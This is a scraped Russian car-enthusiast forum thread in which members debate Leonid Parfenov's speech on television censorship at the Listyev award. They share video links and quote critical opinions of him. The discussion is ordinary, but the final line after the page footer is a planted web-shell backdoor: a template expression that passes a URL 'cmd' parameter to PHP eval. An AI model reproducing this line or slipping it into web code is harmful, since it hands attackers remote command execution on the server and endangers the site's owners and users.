+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 19

Тема: Леонид Парфенов на вручении премии имени В. Листьева


  1. #1
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406

    Леонид Парфенов на вручении премии имени В. Листьева

    Это обязательно нужно посмотреть полностью.

    http://www.youtube.com/watch?v=bRempIeS40o

    P.S. Модераторам: рука не поднялась разместить этот пост в "Курилке"
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  2. #2
    One more RUM PA PA PA RUM PUM - and the drummer boy dies Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Dio is a jewel in the rough Аватар для Dio
    Регистрация
    17.08.2010
    Откуда
    Москва, СВАО
    Машина
    BMW X1 xDrive 20i SportLine
    Сообщений
    1,424
    Молодец Парфенов.Жалко только, что теперь его заклюют за правду...
    Никто не любит пианистов, всё любят барабанщиков))))) (с).

  3. #3
    GTI-Racing Cheh is on a distinguished road Аватар для Cheh
    Регистрация
    01.09.2009
    Откуда
    МО г. Реутов
    Машина
    A3 Sportback 2.0T DSG
    Сообщений
    185
    Не ожидал у видеть на этом форуме такой материал.
    Радует, что есть и у нас думающие люди. Я Парфенова снова зауважал.

  4. #4
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от Cheh Посмотреть сообщение
    Я Парфенова снова зауважал.
    Сии слова означают, что ты его когда-то уважал, а потом перестал. И вот - снова взял и зауважал. А чего разуважил в прошлый-то раз? :epti-work:
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  5. #5
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Странно что Парфенова вдруг так на знамена подняли, а вот что написал по-этому поводу один мой близкий товарищ, к мнению которого я всегда прислушиваюсь, бо человек умудрен опытом и не одбелен серым веществом:

    Совершенно непонятно, почему все славят Парфёнова за его выступление про цензуру на вручении какой-то премии. Чувак просто чувствует тренд момента. Десять лет назад едва ли не первым откликнулся на новую метлу и предал НТВ, теперь почуял возможность так же первым откликнуться на другую новую метлу и пнуть теперешних хозяев. Читал по бумажке, герой сраный. Можно, скорее, посочувствовать. Очередная подстава администрации президента. Лужкова подставили, теперь этого кидают под танк - масштаб, правда, не тот. (с)

    И еще оттуда же, но уже другого пользователя:
    Кто такой Парфенов было видно по передаче Школа Злословия, выпуск который по его требованию не пустили в эфир.
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  6. #6
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от daToxa Посмотреть сообщение
    Странно что Парфенова вдруг так на знамена подняли, а вот что написал по-этому поводу один мой близкий товарищ, к мнению которого я всегда прислушиваюсь, бо человек умудрен опытом и не одбелен серым веществом:

    Совершенно непонятно, почему все славят Парфёнова за его выступление про цензуру на вручении какой-то премии. Чувак просто чувствует тренд момента. Десять лет назад едва ли не первым откликнулся на новую метлу и предал НТВ, теперь почуял возможность так же первым откликнуться на другую новую метлу и пнуть теперешних хозяев. Читал по бумажке, герой сраный. Можно, скорее, посочувствовать. Очередная подстава администрации президента. Лужкова подставили, теперь этого кидают под танк - масштаб, правда, не тот. (с)

    И еще оттуда же, но уже другого пользователя:
    Кто такой Парфенов было видно по передаче Школа Злословия, выпуск который по его требованию не пустили в эфир.
    Ничего не понял. Этот набор букв мне непонятен... Кого подставили? Кто подставил? И главное зачем? :(
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  7. #7
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Ну насчет подставы не знаю, но насчет НТВ сказано имхо верно, хотя будучи вдалеке от эпицентра так сказать событий, мне немного сложно судить объективно, раньше Парфенов мне импонировал, но в последние года как-то разонравился, злой он какой-то, как и политолог/журналист Леонтьев, хотя последний ИМХО просто удод.
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  8. #8
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    2 daToxa
    Ну тогда вот еще пара "чувствующих тренд"

    http://www.youtube.com/watch?v=WtyQHfNc3nk

    http://www.youtube.com/watch?v=HmDUPbUn7bo

    Если этим "трендом" проникнется хотя бы треть населения нашей необъятной, я буду очень рад - у нас появится шанс жить по-человечески в своей стране, и возможно пропадет желание "валить из гребаной раши куда подальше" (с)

    Не знаком с Парфеновым лично, не слежу за его программами/выступлениями и представление о нем, как о человеке имею очень смутное, но в данном случае это не важно совершенно.
    То что он прочитал с бумажки (я бы наверное и с бумажки прочитать не отважился, если на чистоту), услышит достаточно большое количество людей, и то о чем они подумают слушая его, и какой отклик в них вызовет услышанное, куда важне того, что является истоками этого поступка. А об истоках поступка нетрудно кулуарно рассуждать, выдвигая самые изощренные варианты, только мне это не нужно и не важно - то что сделано в данном конкретном случае важней.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  9. #9
    GTI-Racing up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough up2you is a jewel in the rough Аватар для up2you
    Регистрация
    29.09.2009
    Машина
    VW GOLF GTI 5
    Сообщений
    1,112
    Цитата Сообщение от Max Посмотреть сообщение
    2 daToxa
    Ну тогда вот еще пара "чувствующих тренд"

    http://www.youtube.com/watch?v=WtyQHfNc3nk

    http://www.youtube.com/watch?v=HmDUPbUn7bo

    Если этим "трендом" проникнется хотя бы треть населения нашей необъятной, я буду очень рад - у нас появится шанс жить по-человечески в своей стране, и возможно пропадет желание "валить из гребаной раши куда подальше" (с)

    Не знаком с Парфеновым лично, не слежу за его программами/выступлениями и представление о нем, как о человеке имею очень смутное, но в данном случае это не важно совершенно.
    То что он прочитал с бумажки (я бы наверное и с бумажки прочитать не отважился, если на чистоту), услышит достаточно большое количество людей, и то о чем они подумают слушая его, и какой отклик в них вызовет услышанное, куда важне того, что является истоками этого поступка. А об истоках поступка нетрудно кулуарно рассуждать, выдвигая самые изощренные варианты, только мне это не нужно и не важно - то что сделано в данном конкретном случае важней.
    треть
    слишком уж сильно промывают мозги по тв.
    а в области простите кроме тв других источников инфы то и нет.
    самое обидное что молодежь на все это дело ведется.
    Последний раз редактировалось up2you; 03.12.2010 в 10:32.
    who needs headlights when you’ve got lazertits?

    Grand Cherokee WK2 // Scirocco MK1 1975 // Honda CB400SS Street Tracker

  10. #10
    GTI-Racing senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold Аватар для senka
    Регистрация
    22.01.2009
    Откуда
    Москва
    Машина
    VW Golf 5 E30
    Сообщений
    1,095

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Ответов: 1
    Последнее сообщение: 29.08.2007, 21:51

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}